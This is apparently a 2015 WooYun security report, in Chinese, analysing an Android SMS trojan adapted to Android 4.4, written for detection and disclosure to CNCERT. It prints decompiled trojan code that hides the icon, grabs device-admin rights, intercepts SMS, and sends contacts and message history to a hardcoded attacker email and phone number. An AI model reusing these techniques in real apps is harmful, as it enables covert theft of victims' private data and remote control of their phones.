漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0107785
漏洞标题:黑产兼容android 4.4的蠕虫短信马出现(附受害者信息)
相关厂商:cncert
漏洞作者: 路人甲
提交时间:2015-04-14 11:53
修复时间:2015-07-16 09:56
公开时间:2015-07-16 09:56
漏洞类型:地下0day/成功的入侵事件
危害等级:低
自评Rank:1
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向第三方安全合作伙伴开放
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开
简要描述:
高版本的Android不一定安全哦,还是要注意使用习惯.木马通过邮件发送通信录和历史短信,实时截获短信,并且可以通过短信指令控制手机.为啥这些个安全团队/厂商的壳都给木马在用了.
详细说明:
木马用了阿里的壳,脱壳比较蛋疼
因为android 4.4 只有默认短信app才能收发短信,木马在服务中加入了兼容代码
注意不要点这个哦.
硬编码的发件邮箱
入口1:主界面aa.bb.cc.dd.ClientActivity,进行如下操作:
* 隐藏图标
#!java
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
* 激活设备管理
#!java
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.componentName);
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "");
startActivityForResult(localIntent, 20);
* 启动MyService
#!java
startService(new Intent(this, MyService.class));
* 通过短信发送受害者设备id给18458174771
#!java
Assets.sendMsg("18458174771", Assets.getInstallFlag(this, ""));
* 启动MailTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和通信录(邮件内容)给mmqwe1231@163.com
#!java
new MailTask("", this).execute(new Integer[0])
* 启动SmsTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和短信历史(邮件内容)给mmqwe1231@163.com
#!java
new SmsTask("", this).execute(new Integer[0]);
防卸载:设备管理器
入口2:开机启动广播接收器aa.bb.cc.dd.BootReceiver
进行如下操作:
* 启动服务com.iwawad.vaaweea00.MyService
* 发送监控安装短信给18458174771
后台服务:com.iwawad.vaaweea00.MyService
* 对系统版本进行判断,android 4.4启动WebInterfaceActivity,用于设置成默认短信管理软件来得到
default sms app特性已经被木马使用,之前还以为此机制加入会对短信马会有极大遏制,但是现在想想既然傻傻的安装了木马,再傻傻的设置为默认好像很正常.一种木马诞生后往往不会消亡,它会不断的演变进化,此木马就通过简单的代码顺利兼容了android4.4.
入口3:短信广播接收器com.iwawad.vaaweea00.XReceiver
<receiver android:name="com.iwawad.vaaweea00.XReceiver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter android:priority="2147483647"> //设置优先级
<action android:name="android.provider.Telephony.SMS_RECEIVED">//接收短信
</action>
<category android:name="android.intent.category.DEFAULT">
</category>
</intent-filter>
<intent-filter>
<action android:name="android.provider.Telephony.SMS_DELIVER"> //4.4特性,default SMS app
</action>
</intent-filter>
</receiver>
![](recevier.png)
* 短信广播接收器设置最高接收优先级拦截短信,abortBroadcast();忽略短信广播.
* 启动拨号界面```tel:**21*121# **21*# ##21#``` //貌似是测试设备有没有卡
* 拦截记录收(MailTask/SmsTask)发(SendTask)短信邮件通知mmqwe1231@163.com
* 短信指令控制手机:监控状态 SetupMessagesyncTask/发送指定短信 SendMessageasyncTask
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-04-17 09:54
厂商回复:
CNVD确认为移动互联网恶意代码事件,已经转报给CNCERT,按照工业和信息化部《移动互联网恶意程序监测与处置机制》流程处置。
最新状态:
暂无